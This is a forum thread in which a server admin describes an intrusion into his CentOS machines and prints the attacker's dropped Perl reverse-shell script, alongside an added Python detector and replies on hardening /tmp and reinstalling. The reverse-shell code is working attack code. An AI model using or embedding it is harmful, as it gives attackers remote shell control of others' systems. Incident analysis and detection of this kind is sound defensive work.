
Servers Hacked - Explained


mooxe
10-06-2008, 04:47
Hey Guys,

My servers were being hacked continuously the past few days. The exploiters gain SA access and do the whole channel delete thing. I think I found out how.... kinda...

This is a dedicated server I am running. Somehow they are writing two files to the /tmp folder (CentOS). I believe it's probably some PHP exploit through one of my Nuke sites. The files they place are a perl script named "back" and an executable binary named "shbd".

Script "back"

#!/usr/bin/perl
# Reverse shell: connects out to the host and port given on the command line
# and hands the remote side an interactive /bin/sh.
use Socket;
$cmd = "lynx";
$system = 'echo "`uname -a`";echo "`id`";/bin/sh';
$0 = $cmd;    # renames the process to "lynx" in ps; the real lynx binary is never run
$target = $ARGV[0];
$port = $ARGV[1];
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");    # outbound connection, so inbound firewalling does not stop it
open(STDIN, ">&SOCKET");     # stdin, stdout and stderr of the shell all go over the socket
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);             # prints kernel and uid, then drops into the shell
close(STDIN);
close(STDOUT);
close(STDERR);

file shbd
shbd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.2.0, dynamically linked (uses shared libs), not stripped

That's all for now till I find out more. I do not want to post the shbd executable, I will wait for an admin to request it.

MOOXE
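
A small triage script for the two artifacts in this post, added here as an example and not part of mooxe's thread: it lists ELF or executable files dropped in a world-writable directory (the shape of "shbd" and "back"), and flags processes whose visible name does not match the binary in /proc/<pid>/exe, which is what the `$0 = "lynx"` line in "back" produces and why restricting the real lynx binary would not affect it. The sample /tmp contents and process table are constructed; on a live Linux host, feed it the first field of /proc/<pid>/cmdline and os.readlink('/proc/<pid>/exe').

```python
import os
import stat
import tempfile

ELF_MAGIC = b"\x7fELF"

def scan_for_dropped_executables(directory):
    """Regular files in `directory` that start with the ELF magic or carry an
    execute bit: the shape of the 'shbd' binary and the 'back' script."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue  # skip sockets, symlinks and directories
        with open(path, "rb") as fh:
            head = fh.read(len(ELF_MAGIC))
        exec_bits = st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
        if head == ELF_MAGIC or exec_bits:
            hits.append(name)
    return hits

def find_disguised_processes(procs):
    """procs: (pid, argv0, exe) triples, as read from /proc/<pid>/cmdline and
    readlink('/proc/<pid>/exe'). 'back' sets $0 = "lynx", so ps shows lynx
    while exe still points at perl. Triage list only: symlinked interpreters
    also mismatch; login shells ('-bash') are normalised here."""
    return [(pid, argv0, exe) for pid, argv0, exe in procs
            if os.path.basename(argv0).lstrip("-") != os.path.basename(exe)]

def demo():
    """Constructed sample: a fake /tmp plus a hand-written process table."""
    procs = [(4120, "lynx", "/usr/bin/perl"),          # 'back' in disguise
             (4121, "/usr/sbin/httpd", "/usr/sbin/httpd"),
             (4122, "-bash", "/bin/bash")]
    with tempfile.TemporaryDirectory() as tmp:
        for name, data, mode in (("shbd", ELF_MAGIC + b"\0" * 12, 0o755),
                                 ("back", b"#!/usr/bin/perl\n", 0o755),
                                 ("sess_1a2b", b"a|i:1;", 0o600)):  # PHP session file, benign
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
            os.chmod(os.path.join(tmp, name), mode)
        files = scan_for_dropped_executables(tmp)
    return files, find_disguised_processes(procs)

if __name__ == "__main__":
    print(demo())  # (['back', 'shbd'], [(4120, 'lynx', '/usr/bin/perl')])
```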

mooxe
10-06-2008, 06:04
To fix this I have made my /tmp folder secure. No user can run executables anymore within /tmp.

This security feature is very useful to ANY unix server out there.

maggy
10-06-2008, 06:18
You could also change the permissions of the lynx executable so that only root can use it.

Peter
10-06-2008, 18:37
Reinstall your Root Server, as its security has been compromised. Not allowing execution of programmes on /tmp is usually only a small barrier which might prevent the stupidest of script kiddies that cannot even modify their scripts :)
Of course, it won't hurt to configure /tmp non-executable *on the reinstalled root server*.